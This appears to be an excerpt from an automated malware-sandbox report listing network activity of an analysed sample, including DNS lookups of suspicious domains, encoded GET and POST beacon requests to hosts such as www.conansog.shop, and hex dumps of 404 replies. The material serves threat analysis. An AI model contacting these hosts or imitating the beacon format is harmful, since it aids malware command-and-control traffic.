                Source: global trafficHTTP traffic detected: GET /i5gf/?StWXF0Jx=b5EB5wzy9Ffpgxi54+1Z/hpFI4wOrvBGEdwPVoWw9aB094XdY8Z4QvLyijfbNXTXb/o83TjYq8/0I5ZRzCl+Qa/gFZ4gxutURWfxeLyMh3oNbVjBJMQVGcVSIottQNNDqQ==&zfI=jXEDeV4Xp62 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.hobbihub.infoConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: global trafficHTTP traffic detected: GET /6rpr/?StWXF0Jx=U6INZSFl9w/0w7eUclNH1uQloYv6GNk9LcyHZGh1ex/X83RYU2QqyJ4e030xcVzYUaotyR6kZc9FdKJmpo1DO/tZ9h4UUwPPiw7Wz8cuuN6k65sGyuw58EydjYd8v6xFYg==&zfI=jXEDeV4Xp62 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.76kdd.topConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.conansog.shop
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.sipdontshoot.net
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.hobbihub.info
                Source: global trafficDNS traffic detected: DNS query: www.76kdd.top
                Source: unknownHTTP traffic detected: POST /us5e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.conansog.shopConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Origin: http://www.conansog.shopReferer: http://www.conansog.shop/us5e/User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1Data Raw: 53 74 57 58 46 30 4a 78 3d 7a 31 59 39 79 6b 64 41 66 58 6b 48 54 57 73 37 33 72 4e 43 53 5a 65 71 4a 6d 44 73 63 4e 65 31 31 38 45 71 73 47 59 44 61 39 64 62 39 49 6b 45 73 33 4d 61 76 63 63 44 65 65 4e 68 54 6b 6b 34 79 67 4e 39 4f 64 6d 58 37 76 2b 57 79 36 5a 41 5a 61 4a 31 49 61 6a 62 62 55 68 69 65 47 47 33 6c 30 4f 6f 53 63 34 62 42 55 4f 7a 70 56 56 72 6a 66 4d 57 34 35 38 4e 63 33 72 34 32 46 74 69 4e 5a 51 41 58 6f 5a 62 76 76 2b 53 58 6d 4b 53 68 57 76 6e 55 6f 4e 46 75 45 70 47 67 53 77 50 71 68 39 37 32 52 62 48 32 57 4d 4c 6d 77 51 5a 43 33 5a 49 74 75 73 58 6b 6a 46 38 31 53 32 52 64 4c 4d 72 2b 59 55 3d Data Ascii: StWXF0Jx=z1Y9ykdAfXkHTWs73rNCSZeqJmDscNe118EqsGYDa9db9IkEs3MavccDeeNhTkk4ygN9OdmX7v+Wy6ZAZaJ1IajbbUhieGG3l0OoSc4bBUOzpVVrjfMW458Nc3r42FtiNZQAXoZbvv+SXmKShWvnUoNFuEpGgSwPqh972RbH2WMLmwQZC3ZItusXkjF81S2RdLMr+YU=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:48 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UL%2BQQ4tCCc6AxpKhva%2BzfcEbRTuxvV5VfAOfeCcAzI8zySXbY24csgCfUcvhOnDFovHjhBw0rolMNv%2B3IRzyAch%2BdJg%2BbrGJCuXBmZbWoxIfTijoPgOSnWKIxEWr%2FPlFS01a%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6125ab40f68-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:51 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuhUt7DYBU0dRmqFdJA8ZFy%2F%2FaDOfBq4mEYLQIxZT87ZgH3liJzegK9uYdtu1tEJEaJLzzsDh178IoWzk9i5x8z92YyJIsOqFgCoigIh1sEW8WbdU30QVDponseqWNfgzaBhyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6238ad58cb3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:54 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BafI9j%2Bi%2Bvv10noNw6twKzYlabLpFLXV78H6cws9FqUCn%2BCbeURGInbCNCDNRmd7yE1zjuC9DZrfROQtwVzaqhW3mJ0zyPmFGn5yMk5MxZU50e0jtl5pkk4wA75aBNk53jqJEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6341e921899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1823&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:56 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMkEzQI3WwZNrbhPOGAym1Zx0McZ610w0j8HbV%2BSmtvft%2B8adHQSVXd20DYSLi2%2Bza7abWPfvzoLcEwRKoXGx5%2Fb2NV80zjmGL3K6ogyPSqV5SoPQwfKO2NbtT74YMzwAxTe8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6444f94c42c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jz0EPEM%2BKj9v9tGOK3%2FVVwcGi%2BJ8vi6PJxAk6rK2fmtcNrtXz1yNwq2gQ8QLllVHsM3yk8cVH5NNbdNSyNJjl3o20P8m531h%2FtfHM9Q9BeSRF8Mbd2bmCdi35tKDUZqGBe9unVZy95o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a66edd48726b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7SJR5PAu6Nvu2bnzCicAlwpGdhkyLevVIMEU5XJeExmwCLPFp1x0g%2B46%2BQQ1bw6Hh%2BMVbTqYUZAXKCbWSAind3tHQR9Gh3vVcR%2BmlZMGNx%2BfFg002IverXm51rusheP8qRBNebqohs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a67efcab0caa-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z218R7hiMB%2FYE5GRs6PzgTsug9LauZH6l7NfPiZmk1pwEO2zIcMHtaDTijsKGS57hvq6rfdpXZL2jz6LMNizXemOOukA4fV3aU1Y5ayEvimSSCBHYCG6ax6aYeBoDqNDgPFqvpCu9o0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6901ae743a4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9smxA9CAoaDJkDaO48BC%2BUe5cRz1tAvAZqVhqHryPAkE47hpOwHBJpqZk51nyDpkWVNChxXgw2G%2FqTGHwiCQ4uL6mksdLI8406OwZflfmWwitfoH9naUDE25UZ9Eq4Eyg%2BwB5DYaoo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6a0dfcc41e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=532&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 10aad33d-bb1a-4529-b4ba-eb15a1f9f864x-runtime: 0.025302content-length: 17147connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 3fe04f35-cfa6-45d3-b1a0-28d151e173c8x-runtime: 0.036349content-length: 17167connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 